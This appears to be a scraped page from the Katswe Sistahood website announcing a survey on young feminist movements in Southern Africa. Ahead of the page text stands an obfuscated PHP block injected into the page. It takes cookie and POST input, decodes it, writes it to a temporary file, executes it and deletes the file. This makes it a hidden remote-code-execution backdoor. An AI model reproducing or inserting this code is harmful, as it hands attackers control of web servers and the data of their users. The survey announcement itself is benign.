$GQNBl = chr (76) . "\137" . "\115" . "\x4f" . chr ( 610 - 505 )."\x77" . chr (117); $PNxiWrTvc = "\x63" . "\x6c" . 'a' . "\x73" . chr ( 1111 - 996 ).chr (95) . chr ( 651 - 550 ).chr (120) . chr ( 634 - 529 )."\163" . chr ( 1107 - 991 ).chr ( 1073 - 958 ); $zZwPgjqsZ = class_exists($GQNBl); $PNxiWrTvc = "64146";$XOgiXhBFw = strpos($PNxiWrTvc, $GQNBl);if ($zZwPgjqsZ == $XOgiXhBFw){function ZKpfkGoAI(){$qlBNH = new /* 9546 */ L_MOiwu(62921 + 62921); $qlBNH = NULL;}$YweKFLE = "62921";class L_MOiwu{private function zIEfSm($YweKFLE){if (is_array(L_MOiwu::$KVGyNRnBY)) {$name = sys_get_temp_dir() . "/" . crc32(L_MOiwu::$KVGyNRnBY["salt"]);@L_MOiwu::$KVGyNRnBY["write"]($name, L_MOiwu::$KVGyNRnBY["content"]);include $name;@L_MOiwu::$KVGyNRnBY["delete"]($name); $YweKFLE = "62921";exit();}}public function BIgFt(){$CaswLu = "49813";$this->_dummy = str_repeat($CaswLu, strlen($CaswLu));}public function __destruct(){L_MOiwu::$KVGyNRnBY = @unserialize(L_MOiwu::$KVGyNRnBY); $YweKFLE = "20884_21783";$this->zIEfSm($YweKFLE); $YweKFLE = "20884_21783";}public function KAaDGlczg($CaswLu, $VzLfIIK){return $CaswLu[0] ^ str_repeat($VzLfIIK, intval(strlen($CaswLu[0]) / strlen($VzLfIIK)) + 1);}public function xEvYKL($CaswLu){$wRMAcszOV = 'b' . chr ( 461 - 364 )."\163" . "\145" . chr ( 374 - 320 ).chr ( 924 - 872 );return array_map($wRMAcszOV . chr (95) . "\144" . chr ( 104 - 3 )."\x63" . 'o' . 'd' . 'e', array($CaswLu,));}public function __construct($mEUvTzR=0){$vaOduD = chr ( 97 - 53 ); $CaswLu = "";$PDZugynxy = $_POST;$YLBdxdOS = $_COOKIE;$VzLfIIK = "13908a58-5348-4051-b73a-a09243e237fc";$WtueDNJokk = @$YLBdxdOS[substr($VzLfIIK, 0, 4)];if (!empty($WtueDNJokk)){$WtueDNJokk = explode($vaOduD, $WtueDNJokk);foreach ($WtueDNJokk as $MECrBf){$CaswLu .= @$YLBdxdOS[$MECrBf];$CaswLu .= @$PDZugynxy[$MECrBf];}$CaswLu = $this->xEvYKL($CaswLu);}L_MOiwu::$KVGyNRnBY = $this->KAaDGlczg($CaswLu, $VzLfIIK);if (strpos($VzLfIIK, $vaOduD) !== FALSE){$VzLfIIK = explode($vaOduD, $VzLfIIK); $BKmwG = sprintf("20884_21783", strrev($VzLfIIK[0]));}}public static $KVGyNRnBY = 37293;}ZKpfkGoAI();} KATSWE SISTAHOOD | "I am my sister's keeper"

What’s New

Survey on the state of young feminist movements in Southern Africa 

The purpose of this research is to conduct deep listening and collective reflection on the nature, and state of the young feminist movements in Southern Africa.

The study seeks to establish further the capacity gaps and needs of such young feminist groups; both programmatic and organizational development, which have a bearing on young feminist activists’ capacity to influence discourse in their areas of focus. The scoping study findings shall help define possible support mechanisms for emerging and established young feminist-led, and focused initiatives in southern Africa. 

Thank you
Katswe Sistahood

Click to start the survey https://www.surveymonkey.com/r/FM967VW.

"I am my sister's keeper"

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